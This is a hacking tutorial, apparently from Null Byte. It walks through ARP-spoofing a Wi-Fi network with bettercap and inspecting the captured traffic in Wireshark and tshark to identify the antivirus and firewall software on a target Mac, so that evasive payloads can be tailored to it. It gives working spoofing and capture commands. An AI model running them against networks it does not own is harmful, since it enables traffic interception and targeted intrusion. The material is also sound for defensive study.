Identifying security software installed on a MacBook or other Apple computer is important to hackers and penetration testers needing to compromise a device on the network. With man-in-the-middle attacks, packets leaving the Mac will tell us a lot about what kind of antivirus and firewall software is installed.
After gaining access to a Wi-Fi router, a hacker will perform a variety of network-based and reconnaissance attacks. Data traversing the network is viewable to anyone with the password without ever authenticating to the router. While that method is excellent for passive observations, we'll instead perform a man-in-the-middle attack to learn what's happening on the network.
We'll start by installing a man-in-the-middle tool in Kali Linux. Packets moving through the network are redirected to the attacker's system and collected with Wireshark. The traffic is then vulnerable to packet inspection, allowing an attacker to identify installed security software on the macOS computer.
- Don't Miss: Create an Undetectable macOS Payload with Armor
Bettercap, developed by evilsocket and some cool people, is an extensible and portable offensive security framework. While it features several useful tools, let's focus on the man-in-the-middle functionalities.
Install bettercap in Kali with the following command.
~$ sudo apt update && sudo apt upgrade && sudo apt install bettercap Hit:1 http://kali.download/kali kali-rolling InRelease Reading package lists... Done Building dependency tree Reading state information... Done 17 packages can be upgraded. Run 'apt list --upgradable' to see them. Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages have been kept back: crackmapexec gcc-10-base lib32gcc-s1 lib32stdc++6 libatomic1 libcc1-0 libgcc-s1 libgfortran5 libgomp1 libitm1 liblsan0 libobjc4 libquadmath0 libstdc++6 libtsan0 libubsan1 php-common 0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded. Reading package lists... Done Building dependency tree Reading state information... Done bettercap is already the newest version (2.28-0kali2). 0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Before starting the man-in-the-middle attack, create a named pipe with the mkfifo command. Bettercap will write captured packets to the pipe, allowing Wireshark to analyze the traffic in real-time. The "wiretap" file name that I used is arbitrary and can be changed.
~$ mkfifo /tmp/wiretap
Start bettercap with the following options to automatically begin ARP spoofing and saving data to the wiretap file.
~% sudo bettercap -eval "set net.sniff.output /tmp/wiretap; net.sniff on; arp.spoof on" bettercap v2.28 (built for linux amd64 with go1.14.4) [type 'help' for a list of commands] [05:44:08] [sys.log] [inf] net.sniff starting net.recon as a requirement for net.sniff [05:44:08] [endpoint.new] endpoint 192.168.1.47 detected as 7e:13:a9:b6:07:77. [05:44:08] [sys.log] [inf] arp.spoof enabling forwarding » [05:44:08] [sys.log] [inf] arp.spoof arp spoofer started, probing 16384 targets.
Wait a few seconds for traffic to generate in the Bettercap terminal, as opening Wireshark too quickly sometimes caused the man-in-the-middle attack to fail. Then, in a new terminal, open Wireshark with the following command to immediately (-k) begin capturing traffic on the input interface (-i) or file (i.e., /tmp/wiretap).
~$ wireshark -k -i /tmp/wiretap
Wireshark will capture and display packets originating from other devices on the network in real-time.
AVG Antivirus, like Avast, is a very well-known antivirus software solution for Windows 10, macOS, and Android phones. As AVG was acquired by Avast several years ago, traffic originating from a MacBook would be seen connecting to Avast servers.
Antivirus tools periodically fetch software and virus definition updates, and an attacker can observe those on the network. With Avira, some updates happen over plain HTTP.
This traffic is also viewable in Wireshark with the following display filter.
http.host ~ "(?i)(avira|avast|avcdn|avg)"
Expand any of the HTTP streams in Wireshark to find more information about traffic originating from the Mac. In my example, the unique user-agent string strongly suggests an installed application querying Avira servers (i.e., virus definition updates).
At any point, the packet capture can be stopped in Wireshark and exported for further analysis with tools like tshark and NetworkMiner. The below command will filter out user-agent strings and count how many times they appear in the PCAP file. In my case, notice the unique Avira user-agent that appears almost one hundred times.
~$ tshark -r avira.pcap -n -T fields -e http.user_agent | sort | uniq -c 22337 98 @AUVI@1.1; AntiVir-uxupdate-22.214.171.124 (PERS; WKS; EN; AVE 126.96.36.199; VDF 188.8.131.52; Darwin x86_64 18.0.0; ; US; ; 2219669652-SAVXS-0000001; EN-US; 184.108.40.206; 0; 0; 0) 2 curl/7.54.0 2 Google Chrome/75.0.3770.80 Mac OS X
All of the above information gathered during a five-minute MitM attack would strongly suggest Avira as well as Avast (AVG) software is installed on the target Mac. This data would enable an attacker to emulate the environment before engaging the target with a payload designed explicitly to actively evade detection.
LuLu, created by Objective-See, is an open-source firewall solution and alternative to LittleSnitch for macOS. For a tutorial on how to evade LuLu's detection system, check out "How to Bypass the LuLu Firewall in macOS."
Like most modern software, LuLu has built-in functionality to fetch software updates automatically.
LuLu updates are more difficult to detect as it utilizes Server Name Indication (SNI), an extension to the TLS protocol. In the bettercap terminal, the "objective-see.com" hostname will appear when queried by LuLu but is easily missed in a stream of traffic.
In Wireshark, press Control-F to open the "Find Packet" search tool. Change the first category to "Packet details," the third category to "String," and search for "objective-see." Wireshark will snap to the nearest packet containing that string. Notice the domain in the packet details.
- Don't Miss: How to Bypass the LuLu Firewall in macOS
Similarly, the following grep command will filter the PCAP for any search term.
~$ grep -ia 'objective-see' /path/to/capture.pcap 3pdy/3.1spdy/http/1.1objective-see.com 3pdy/3.1spdy/http/1.1objective-see.com 3pdy/3.1spdy/http/1.1objective-see.com 3pdy/3.1spdy/http/1.1objective-see.com
While it's not definitive evidence of a LuLu update, to attackers on the network, it would only suggest one or more Objective-See security solutions installed on the operating system. From a quick look at the packets generated during a version check, there wasn't anything that strongly implicated LuLu specifically. This data would suggest the target is security conscious.
With a comprehensive list of popular antivirus software, attackers will usually be able to say with certainty if a target macOS device has security software installed. What's worse is software enumeration can be accomplished without connecting to the Wi-Fi network.
Follow me on Twitter @tokyoneon_ to keep up with my current projects. For questions and concerns, leave a comment or message me on Twitter.
It’s Black Friday week in the Null Byte shop! If you’ve been wanting to improve your skill set in hacker- and cybersecurity-geared topics such as Python, Raspberry Pi, and Linux, now’s the time. We’ve got huge sales on online courses, and we’ve outlined 13 favorites you won’t want to miss. Check them out!